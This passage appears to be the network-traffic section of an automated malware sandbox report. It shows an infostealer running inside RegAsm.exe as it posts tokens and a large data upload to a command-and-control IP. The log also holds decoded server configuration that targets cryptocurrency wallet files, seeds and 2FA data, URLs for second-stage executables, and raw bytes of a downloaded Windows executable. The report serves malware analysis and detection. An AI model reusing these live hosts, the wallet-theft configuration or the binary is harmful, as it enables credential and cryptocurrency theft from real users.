                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.5497345.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:57 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 331
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DHIDHIEGIIIECAKEBFBACont
                                                                                                      2024-09-26 17:05:58 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:58 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:58 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                      Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.5497355.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:05:59 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 461
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:05:59 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAKEBAFIIECBGCAAAAFCCont
                                                                                                      2024-09-26 17:05:59 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:05:59 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:05:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.5497365.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:06:01 UTC279OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 98097
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:06:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FBKJDGCGDAAAKECAKKJDCont
                                                                                                      2024-09-26 17:06:01 UTC16355OUTData Raw: 53 55 44 45 6f 70 61 53 67 59 55 6c 4c 53 47 67 41 70 4b 57 69 6d 41 6c 49 61 57 69 67 61 45 6f 4e 46 47 4b 42 69 55 55 74 4a 51 41 55 6c 4c 53 55 78 69 55 68 70 31 4a 51 4d 53 69 6c 70 4b 42 69 55 55 74 49 52 51 41 6c 42 6f 6f 6f 30 47 4a 52 52 52 51 4d 53 6b 70 31 4a 69 69 34 43 55 6c 4f 78 54 54 51 4d 4b 53 6c 6f 6f 47 4e 4e 46 4c 53 55 44 44 74 53 55 75 4b 54 46 41 78 4b 53 6e 55 6d 4b 51 43 55 6c 4c 31 70 4b 42 69 64 36 54 74 54 71 51 69 67 6f 51 30 6c 4f 4e 49 52 51 4d 62 30 4e 46 4b 61 54 72 51 41 6e 57 6b 49 70 32 4d 55 30 69 67 6f 4b 51 38 69 6c 78 53 66 51 59 6f 41 4b 53 6c 78 7a 6d 69 67 59 32 69 6c 70 4f 2f 39 61 42 69 48 6b 55 48 6b 55 74 46 41 78 75 66 78 46 4a 30 70 78 37 30 33 48 46 41 77 2f 43 6a 72 2f 77 44 58 70 65 63 65 74 49 65 66 61
                                                                                                      Data Ascii: SUDEopaSgYUlLSGgApKWimAlIaWigaEoNFGKBiUUtJQAUlLSUxiUhp1JQMSilpKBiUUtIRQAlBooo0GJRRRQMSkp1Jii4CUlOxTTQMKSlooGNNFLSUDDtSUuKTFAxKSnUmKQCUlL1pKBid6TtTqQigoQ0lONIRQMb0NFKaTrQAnWkIp2MU0igoKQ8ilxSfQYoAKSlxzmigY2ilpO/9aBiHkUHkUtFAxufxFJ0px703HFAw/Cjr/wDXpecetIefa
                                                                                                      2024-09-26 17:06:01 UTC16355OUTData Raw: 2f 4f 70 7a 44 6b 2f 4b 77 50 74 30 71 4e 6b 5a 66 76 4c 54 75 69 6c 4a 44 4d 55 6d 4b 64 67 63 38 30 47 6d 55 4d 49 2b 61 6a 39 61 64 6a 69 67 6a 69 6e 59 59 77 67 59 70 4d 65 2f 77 43 4e 50 78 78 2b 46 47 4b 4c 49 64 79 50 47 44 30 70 43 4d 31 4a 69 6b 32 35 2f 77 44 31 30 57 48 63 6a 49 7a 54 63 59 46 53 59 2f 4f 67 6a 32 37 30 72 44 75 51 6b 55 33 46 54 45 59 4e 4d 49 70 57 4b 54 47 59 77 61 51 6a 30 70 35 7a 6d 6b 49 4e 4b 78 56 78 6e 53 6a 42 48 74 54 68 2f 6e 4e 47 44 2f 38 41 58 70 32 48 63 62 6a 36 55 59 35 2f 6e 54 73 65 74 49 52 78 52 59 4c 6a 65 67 6f 77 44 54 73 44 6d 6b 50 46 4f 77 37 6a 63 55 6c 50 4e 4e 78 52 59 59 30 69 6a 38 36 64 6a 2f 38 41 58 54 54 31 36 30 72 44 47 30 55 74 46 4b 77 30 4a 6a 4e 4e 2b 6c 4f 49 70 4f 4f 33 65 70 47 4e
                                                                                                      Data Ascii: /OpzDk/KwPt0qNkZfvLTuilJDMUmKdgc80GmUMI+aj9adjigjinYYwgYpMe/wCNPxx+FGKLIdyPGD0pCM1Jik25/wD10WHcjIzTcYFSY/Ogj270rDuQkU3FTEYNMIpWKTGYwaQj0p5zmkINKxVxnSjBHtTh/nNGD/8AXp2Hcbj6UY5/nTsetIRxRYLjegowDTsDmkPFOw7jcUlPNNxRYY0ij86dj/8AXTT160rDG0UtFKw0JjNN+lOIpOO3epGN
                                                                                                      2024-09-26 17:06:01 UTC16355OUTData Raw: 6f 47 46 46 46 46 4d 41 70 4b 57 6b 6f 41 4b 4b 54 4e 46 4d 59 55 55 55 55 44 45 6f 6f 6f 7a 52 59 41 70 4b 4d 30 55 41 46 46 46 46 4d 59 5a 6f 7a 53 55 55 77 43 69 69 6b 4e 49 59 6f 2b 38 4b 33 37 72 2f 41 49 2b 57 2b 67 2f 6b 4b 35 38 48 35 68 57 2f 63 2f 38 41 48 77 33 30 58 2b 51 72 47 70 38 53 42 66 45 69 4b 6a 69 69 6b 7a 53 4e 4f 67 74 46 4a 52 54 41 55 30 6c 46 4a 51 41 55 74 4a 52 51 4d 4b 4f 31 46 42 36 55 41 4a 52 53 55 74 41 77 70 44 53 30 68 37 30 41 4e 6e 2f 34 38 4c 72 2f 41 48 42 2f 36 45 4b 6f 36 62 2f 72 33 2f 33 66 36 31 65 6e 2f 77 43 50 4b 36 2f 33 42 2f 4d 56 52 30 33 2f 41 46 37 2f 41 4f 35 2f 57 6e 48 34 57 49 30 61 4b 51 47 6c 6f 47 47 61 41 61 4b 4b 41 45 70 65 61 4b 4b 41 44 4f 4b 58 4e 4e 36 30 5a 6f 43 77 37 4e 4c 54 61 4d 30
                                                                                                      Data Ascii: oGFFFFMApKWkoAKKTNFMYUUUUDEooozRYApKM0UAFFFFMYZozSUUwCiikNIYo+8K37r/AI+W+g/kK58H5hW/c/8AHw30X+QrGp8SBfEiKjiikzSNOgtFJRTAU0lFJQAUtJRQMKO1FB6UAJRSUtAwpDS0h70ANn/48Lr/AHB/6EKo6b/r3/3f61en/wCPK6/3B/MVR03/AF7/AO5/WnH4WI0aKQGloGGaAaKKAEpeaKKADOKXNN60ZoCw7NLTaM0
                                                                                                      2024-09-26 17:06:01 UTC16355OUTData Raw: 55 55 44 45 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 42 44 53 30 55 59 70 6a 45 70 66 78 6f 6f 78 51 41 6c 46 4c 69 6b 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 42 4b 4b 58 46 4a 69 67 41 6f 70 61 54 46 41 43 55 75 4b 4d 55 55 41 46 48 65 69 69 67 59 47 6b 70 61 53 67 41 6f 6f 6f 6f 41 53 69 69 6a 46 4d 41 6f 6f 78 52 51 4d 53 69 6e 59 39 71 51 69 67 42 4b 4b 58 6a 31 46 47 56 46 46 30 41 6c 46 47 34 65 6c 4a 76 39 68 52 64 42 5a 68 69 6c 77 61 62 76 4e 4a 75 4a 37 6d 69 34 37 44 38 55 48 41 37 69 6f 38 2b 39 4a 52 63 64 69 54 4b 2b 74 4a 75 57 6d 55 6c 41 37 45 6d 2f 32 70 50 4d 50 61 6d 55 55 42 59 63 58 4a 37 30 6d 66 65 6d 30 55 44 73 48 46 48 34 30 55 6c 41 78 61 4d 30 6c 46 41 77 7a 53 55 55 55 41 46 4a 53 30 33 4e 41 78 61 51 30 74 4a 51 46 67 6f 6f
                                                                                                      Data Ascii: UUDEooooAKKKKACiiigBDS0UYpjEpfxooxQAlFLikoAKKKKACiiigBKKXFJigAopaTFACUuKMUUAFHeiigYGkpaSgAooooASiijFMAooxRQMSinY9qQigBKKXj1FGVFF0AlFG4elJv9hRdBZhilwabvNJuJ7mi47D8UHA7io8+9JRcdiTK+tJuWmUlA7Em/2pPMPamUUBYcXJ70mfem0UDsHFH40UlAxaM0lFAwzSUUUAFJS03NAxaQ0tJQFgoo
                                                                                                      2024-09-26 17:06:01 UTC16322OUTData Raw: 64 45 38 43 52 61 68 34 5a 31 65 2b 75 5a 5a 6f 37 36 31 65 57 4f 33 69 56 67 46 63 78 72 6b 35 42 47 54 7a 78 77 52 57 52 71 2b 68 57 6d 6d 65 46 4e 46 76 38 41 7a 4a 6a 66 61 68 35 6a 75 68 59 62 46 51 48 6a 41 78 6e 4a 42 58 76 36 31 34 71 77 4f 46 6c 4c 6c 55 6e 65 39 75 6e 61 2f 59 2b 30 65 4b 72 70 63 7a 53 2f 72 35 6e 76 47 72 51 79 7a 57 49 45 4d 5a 6b 64 4a 6f 5a 64 67 49 42 59 4a 49 72 45 44 4a 41 7a 67 48 71 61 35 6e 78 4e 6f 38 32 74 71 4c 69 33 30 61 38 68 76 6c 47 41 37 50 44 74 63 65 6a 59 6b 2f 49 31 75 33 75 75 52 57 64 33 4a 41 31 7a 70 53 46 4d 66 4c 50 66 69 4e 78 6b 41 38 72 74 4f 50 7a 71 54 54 74 58 6a 31 43 34 61 4a 4a 39 4f 6b 49 54 64 69 32 76 50 4e 62 71 4f 6f 32 6a 6a 6e 72 39 4b 38 71 4d 4b 73 4c 56 49 36 48 58 4e 30 71 69 64
                                                                                                      Data Ascii: dE8CRah4Z1e+uZZo761eWO3iVgFcxrk5BGTzxwRWRq+hWmmeFNFv8AzJjfah5juhYbFQHjAxnJBXv614qwOFlLlUne9una/Y+0eKrpczS/r5nvGrQyzWIEMZkdJoZdgIBYJIrEDJAzgHqa5nxNo82tqLi30a8hvlGA7PDtcejYk/I1u3uuRWd3JA1zpSFMfLPfiNxkA8rtOPzqTTtXj1C4aJJ9OkITdi2vPNbqOo2jjnr9K8qMKsLVI6HXN0qid
                                                                                                      2024-09-26 17:06:02 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:06:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:06:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2ok0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.5497385.75.211.1624436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:06:03 UTC277OUTPOST / HTTP/1.1
                                                                                                      Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: 5.75.211.162
                                                                                                      Content-Length: 331
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:06:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 30 31 66 35 64 35 36 31 36 64 31 63 66 65 32 37 37 38 33 39 36 36 66 37 65 35 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74
                                                                                                      Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"8501f5d5616d1cfe27783966f7e54258------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AAKKFHCFIECAAAKEGCFICont
                                                                                                      2024-09-26 17:06:04 UTC158INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 26 Sep 2024 17:06:04 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2024-09-26 17:06:04 UTC135INData Raw: 37 63 0d 0a 4d 54 49 78 4f 44 63 7a 4f 58 78 6f 64 48 52 77 63 7a 6f 76 4c 32 52 69 63 32 31 6c 62 6d 45 75 59 32 39 74 4c 32 78 71 61 47 64 6d 63 32 51 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 45 34 4e 7a 51 77 66 47 68 30 64 48 42 7a 4f 69 38 76 5a 47 4a 7a 62 57 56 75 59 53 35 6a 62 32 30 76 64 6d 52 7a 61 47 5a 6b 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 7cMTIxODczOXxodHRwczovL2Ric21lbmEuY29tL2xqaGdmc2QuZXhlfDF8a2tra3wxMjE4NzQwfGh0dHBzOi8vZGJzbWVuYS5jb20vdmRzaGZkLmV4ZXwxfGtra2t80


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.549739172.105.54.1604436508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-09-26 17:06:05 UTC171OUTGET /ljhgfsd.exe HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                      Host: dbsmena.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-09-26 17:06:06 UTC284INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 26 Sep 2024 17:06:05 GMT
                                                                                                      Server: Apache
                                                                                                      Upgrade: h2,h2c
                                                                                                      Connection: Upgrade, close
                                                                                                      Last-Modified: Thu, 26 Sep 2024 16:59:48 GMT
                                                                                                      ETag: "c218c-5e028-62308aa93ecb1"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 385064
                                                                                                      Content-Type: application/x-msdownload
                                                                                                      2024-09-26 17:06:06 UTC7908INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 91 f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf> @ `
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: 13 ef d2 a2 82 10 e4 7b 18 b1 3b 98 2a 47 7f 40 7c 65 20 fd 2e a9 40 96 75 f4 7a a2 0d dd d5 19 59 97 3c 4a 80 e4 e6 3b 9d 07 a4 29 69 dd a7 93 7e 44 db f2 c7 f2 fb b3 49 1a e8 f0 62 2e 1c 2f f2 0f a7 c2 d1 41 28 2e de 6a 3a 64 72 a0 99 67 58 1d ae 19 6c 5d 2d a4 25 2c ed ae 41 0e db 5a c3 ec 3b 9b 76 46 db 2b 85 95 f7 dd 6a 6d f5 5f 6d 16 68 d3 9d b5 fb 1d 3a 90 c1 32 23 71 e9 7c 94 30 36 fc 99 f8 aa 24 6d 43 a4 b4 0d e5 22 91 9e 99 f3 99 e9 53 8d 37 87 ea c1 e3 ab 30 d7 33 5d b0 e9 2e c9 a8 85 5b e6 07 06 97 27 d4 5d 18 e8 9e 18 10 0b 1a 47 40 b9 09 22 8f 06 18 ba 1a 01 0b 71 80 63 15 ee 60 a6 f4 c4 86 57 b8 fb c9 5f 52 3c 06 a0 96 59 74 bd d9 e9 f4 85 df 89 25 14 0e bf 0d 47 ca 17 d1 28 0b 73 5f 18 8b e1 01 37 be dc f1 bf 11 d9 84 f4 62 d4 08 c8 44 8c
                                                                                                      Data Ascii: {;*G@|e .@uzY<J;)i~DIb./A(.j:drgXl]-%,AZ;vF+jm_mh:2#q|06$mC"S703].[']G@"qc`W_R<Yt%G(s_7bD
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: 04 f2 f3 42 4b f0 da d7 38 cd 18 14 d2 03 7f 1b cb f1 cf 8e fb f0 d4 ef 03 28 13 e9 2c 87 fa 8a 86 3e 1d 87 9f 5d f7 94 00 33 ed 3a 49 f6 49 f5 d9 b6 69 62 bc 77 3e 12 bb 48 4f 3d 43 7a 74 a8 b7 05 e9 88 fd 24 82 47 03 83 bd 8b d7 17 5c 79 de 65 be df 3a 01 25 d1 cd 00 93 4a b3 8d 9a eb 0e cf af c0 24 05 b4 c2 95 d7 4f ab fa 0d b7 bd 2d f5 86 30 40 14 52 b9 ae 2b 86 a0 c0 66 6e 57 e6 a2 6d 06 73 ff ce e2 c0 93 ba 43 bb 24 20 01 2d 49 a4 24 d3 98 27 9d 0f 37 6c f9 82 31 f3 02 ab c7 d1 99 c1 85 92 50 8c bc c6 51 27 bf e3 f8 73 30 66 df 44 71 94 ab cb aa 0d d6 b9 89 9c 85 37 54 f2 46 a1 91 3c 2b cf 06 93 8c 5d f3 62 ee 62 2e f5 43 7f b6 f9 8d ac 9f 05 e8 a8 78 42 92 a0 9a a1 38 f1 7d 3a 03 46 20 16 7c f4 78 26 56 23 63 c6 88 37 65 8f 38 24 b2 af bb 2c 96 c8
                                                                                                      Data Ascii: BK8(,>]3:IIibw>HO=Czt$G\ye:%J$O-0@R+fnWmsC$ -I$'7l1PQ's0fDq7TF<+]bb.CxB8}:F |x&V#c7e8$,
                                                                                                      2024-09-26 17:06:06 UTC8000INData Raw: c3 65 84 87 a2 af fb f7 e6 c8 0e e6 86 18 4b aa 8b 5f 54 d7 43 e8 94 03 b8 52 bc 83 5e a0 35 4d cc b1 67 63 f7 bf b5 e1 a2 47 e2 b2 a5 d7 79 db 4f 8b 53 5d 39 81 b3 9b 8b 90 a6 5d 48 0c f5 42 19 6d 59 ea dd 51 50 fe 01 4c 7d 60 e5 44 74 e5 d5 f3 bd 20 69 54 d6 95 c7 fa ec b1 b0 97 d4 5d c6 d1 0d f3 01 0d 0b 7a 9a e1 85 56 07 8c 0d 32 30 36 d8 71 c1 55 e4 47 cd 9b 2d ff 07 17 9b d0 63 61 06 b4 76 71 a6 aa fe b8 24 6f e4 b9 6e 21 73 27 34 87 33 35 7d 89 ae ec 37 8b 64 34 e9 31 cc 0e e7 e1 7b 7e d8 1b 8e 39 90 35 94 c8 dd c6 4f 63 ec 2c bb db 61 69 8a 2a 81 ca f7 a3 9b ea e9 b4 85 b9 54 2a 2a 91 51 5e f2 1f b2 f2 20 22 cf fb 92 bc 7b 2e 35 2f 69 0b e2 2b d1 ed ca 2a 7d b0 96 a7 4f e1 20 ff af 7d 53 a2 0b d2 ea 31 1a 3d d8 b2 42 18 c4 03 e4 3e 96 72 ff cd af
                                                                                                      Data Ascii: eK_TCR^5MgcGyOS]9]HBmYQPL}`Dt iT]zV206qUG-cavq$on!s'435}7d41{~95Oc,ai*T**Q^ "{.5/i+*}O }S1=B>r
